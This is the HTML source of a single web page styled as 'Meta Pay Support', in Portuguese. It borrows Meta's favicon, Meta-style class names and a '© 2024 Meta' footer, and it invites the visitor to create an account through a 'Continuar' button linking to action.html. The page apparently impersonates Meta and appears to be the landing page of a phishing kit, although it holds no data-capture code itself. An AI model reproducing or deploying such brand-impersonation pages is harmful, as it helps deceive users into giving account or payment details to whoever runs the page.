<!DOCTYPE html>
<html>
  <head>
    <title>Suporte Meta Pay </title>
<!-- add icon link -->
        <link rel = "icon" href =  "https://static.xx.fbcdn.net/rsrc.php/y5/r/m4nf26cLQxS.ico" 
        type = "image/x-icon"> 
    <style>
      body {
        font-family: Arial,Helvetica, sans-serif;
        background-color: #f0f2f5;
        text-align: center;
        display: flex;
        justify-content: center;
        align-items: center;
        flex-direction: column; 
      
         height: 100vh;
        margin: 0;
        overflow: hidden !important;
      }

      #logo {
        max-width: 100px;
        height: auto;
        display: block;
        margin: 0 auto;
        margin-bottom: 20px;
      }

      .content {
        background-color: #fff;
        padding: 20px;
        border-radius: 5px;
        box-shadow: 0px 0px 10px rgba(0, 0, 0, 0.1);
        min-width: calc(30vw + 400px);
        
        margin: 0 auto;
      }

      h2 {
        font-family: Arial, sans-serif;
        font-size: calc(20px + 1vw);
        margin-top: 0;
        color: #333;
      }

      hr {
        margin: 20px 0;
        border: 0;
        border-top: 1px solid #ddd;
        width: 100%;
      }

      p {
        font-family: Arial, sans-serif;
        font-size: calc(85% + 12px);
        color: #666;
      }

      button {
        padding: 10px 20px;
        background-color: #1877f2;
        color: #fff;
        border: none;
        border-radius: 5px;
        font-size: calc(90% + 12px);
        cursor: pointer;
        margin-top: 20px;
      }

      /* Media queries for responsiveness */
      @media (max-width: 767px) {
        h2 {
          font-size: 21px;
        }

        p {
          font-size: 14px;
        }

        button {
          font-size: 16px;
        }
      }

      @media (max-width: 480px) {
        #logo {
          max-width: 80px;
          margin-bottom: 10px;
        }

        h2 {
          font-size: 18px;
        }

        p {
          font-size: 12px;
        }

        button {
          font-size: 14px;
        }
      }
    </style>
  </head>
  <body>
    <div class="content">
      <div id="logo-container">
        <img
          id="logo"
          src="https://static.xx.fbcdn.net/rsrc.php/y5/r/m4nf26cLQxS.ico"
          alt="Meta Logo"
        />
      </div>
      <h2 class="x16g9bbj xobpncf x1r28tcg x1ij0wma xsp84uj xs4ormy xxgyeuj xme0v8z xu0txxm xcxolhg xn57rk6 x13mtej6 xcgl0sk x1kanymm x1i6xp69 xkifxcc x12429cg x6tc29j xbq7h4v x6jdkww xq9mrsl x1a2a7pz"> Meta Pay Support  </h2>
      <hr />
      <p>
       Crie sua conta
      </p>
      <a href="action.html"><button id="continueButton">Continuar</button></a>
    </div>
    <p> <h4> © 2024 Meta </4> </p>
  </body>
</html>
